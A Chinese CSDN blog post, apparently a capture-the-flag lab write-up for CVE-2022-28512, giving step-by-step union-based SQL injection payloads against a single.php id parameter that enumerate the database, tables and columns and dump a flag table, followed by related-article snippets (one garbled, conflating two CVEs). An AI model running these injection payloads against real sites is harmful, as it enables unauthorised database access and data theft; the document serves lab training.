春秋云镜CVE-2022-28512

最新推荐文章于 2024-05-20 17:59:33 发布
最新推荐文章于 2024-05-20 17:59:33 发布
阅读量192 收藏 2
点赞数
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sjsjshhs134654/article/details/133313169
版权

目录

1:开启靶机访问

2:根据提示确定目标点

3:访问该路径/single.php,并且id传参 发现单引号闭合

4:访问该路径/single.php,并且id传参,发现十个字段

5:

1:开启靶机访问

2:根据提示确定目标点

3:访问该路径/single.php,并且id传参 发现单引号闭合

4:访问该路径/single.php,并且id传参,发现九个字段

/single.php?id=1'order by 10-- asd

5:使用联合查询,知道回显位

/single.php?id=1000' union select 1,2,3,4,5,6,7,8,9-- asd

6:查看数据库版本和名字

/single.php?id=1000' union select 1,version(),3,database(),5,6,7,8,9-- asd

7:查询表名,找到flag表名字

/single.php?id=1000' union select 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables where table_schema=database() -- asd

8:查询字段名

/single.php?id=1000' union select 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database() and table_name='flag' -- asd

9:查看字段数据,找到flag

/single.php?id=1000' union select 1,group_concat(flag),3,4,5,6,7,8,9 from flag -- asd

Jehol丶fan
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
春秋云境】CVE-2022-28512
ZXW_NUDT的博客
02-22 2396
春秋云境】CVE-2022-28512
春秋云境CVE-2022-28525,2024最新网络安全面试真题解析
2201_75604694的博客
04-07 893
开始上传,结果最顶上提示我已经修改了数据,但是尴尬的是为什么我看不到修改后的文件呢,是不是我哪里出错了,后来才发现我原来是上传的时候没有点击new image这个按钮,导致我上传的东西我看不见。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
CVE-2022-28512 春秋云镜
biejianghua的博客
11-28 721
CVE-2022-28512
春秋云镜 CVE-2022-22947
qq_22002773的博客
07-18 290
春秋云镜 CVE-2022-22947
春秋云镜 CVE-2022-0788
qq_22002773的博客
08-27 306
春秋云镜 CVE-2022-0788
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
CVE-2022-22965 GUItools单个图形化利用工具
04-06
CVE-2010-1622中曾出现由于参数自动绑定机制导致的问题, 此前通过黑名单的方式修复了该漏洞,但是 JDK9之后引入了 Module,使得可以通过 getModule 绕过前者的黑名单限制,最后导致远程代码执行。
mysql事务(原理)
m0_74347016的博客
05-19 513
mysql事务原理
生产报表工具PI DataLInk 与 行列视之间的区别
2401_83701843的博客
05-17 245
行列视,全名“行列视生产数据应用系统”,行列视品牌所面对的业务范围远远超越了PIDatalink报表工具,他首先是一款本地部署的在线Excel文档管理系统,解决个人报表在线管理问题,其次,她和PIDataLInk一样,也是面向实时数据库报表需求的一套工具,其区别在于行列视品牌兼容国内外大多数实时数据库,也可以同时连接多个数据源,也就是她完全可以替代PI-DataLINk,同时也适用于其他品牌下的实时数据库系统;
MySQL存储过程添加二十万条数据日常练习
mi_mx的博客
05-17 302
【代码】MySQL日常练习。
MongoDB聚合运算符:$zip
superatom01的博客
05-15 355
摘要:`$zip`用于将输入数组的元素重新组合转换为新的数组,重组转换的的规则是使用输入数组的第一个元素重组为第一个数组,使用第二个元素重组为第二个数组,以此类推。
CentOS8+MySQL8.0.26+Skywalking9.7.0数据清理机制
xiaozhanfeng的博客
05-15 789
#### 代码中定义的额外模型列,这些模型列在聚合或查询时不需要,会加重负载。但激活后,用户可以看到名称,更容易自行查询数据。##### 1级聚合到2级聚合的刷新时间,默认500毫秒。##### TOPN记录报告周期,默认10分钟。##### 执行数据持久化周期,默认25秒。##### 数据清理定时器,默认5分钟。##### 明细记录有效期,默认3天。##### 监测数据有效期,默认7天。##### 会话时间阈值,默认70秒。##### 数据清理开关,默认开启。
国产化信息技术基础设施构建方案
雨笋情缘的专栏
05-20 204
随着信息技术国产化的趋势日益增强,为保障信息安全与自主可控,本方案旨在通过全面调研与科学评估,实现操作系统及基础软件的国产替代。本方案将聚焦于国产操作系统的调研与选择,以及数据库、中间件等基础软件的国产化替代方案,确保技术体系的高效稳定运行与持续发展。本方案旨在通过系统性的调研与评估,实现信息技术基础设施的国产化升级,提升系统的安全性与自主可控能力。未来,随着国产软硬件生态的不断成熟,将进一步优化技术栈,促进技术创新与产业升级,为企业的可持续发展奠定坚实的基础。兼容性:对常用应用软件、硬件设备的支持情况。
Service Worker的生命周期和全局对象和API
SaRAku的博客
05-14 814
当我们注册了Service Worker后,它会经历生命周期的各个阶段,同时会触发相应的事件。整个生命周期包括了:installing --> installed --> activating --> activated --> redundant。当Service Worker安装(installed)完毕后,会触发install事件;而激活(activated)后,则会触发activate事件。serviceWorker中,进程的全局对象(类似于window)叫做。
mysql 按区间统计 3 分钟维度
最新发布
weixin_43153309的博客
05-20 83
时间按三分钟切块,后进行统计。
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来修复这个漏洞,并提供了相关链接供参考。 另外,引用中还提供了一个链接,指向一个网址http://eci-2zej5zymcbcri9jmain3.cloudeci1.ichunqiu.com/,但无法确定这个链接与CVE-2022-0543之间的具体关系。 引用中还展示了一个尝试读取系统文件的HTTP请求,但同样无法确定这个请求与CVE-2022-0543之间的具体关系。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2022-33891POCApache Spark 命令注入(CVE-2022-33891)POC](https://download.csdn.net/download/qq_51577576/86396832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [[春秋云镜]CVE-2022-0543](https://blog.csdn.net/niubi707/article/details/128305838)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值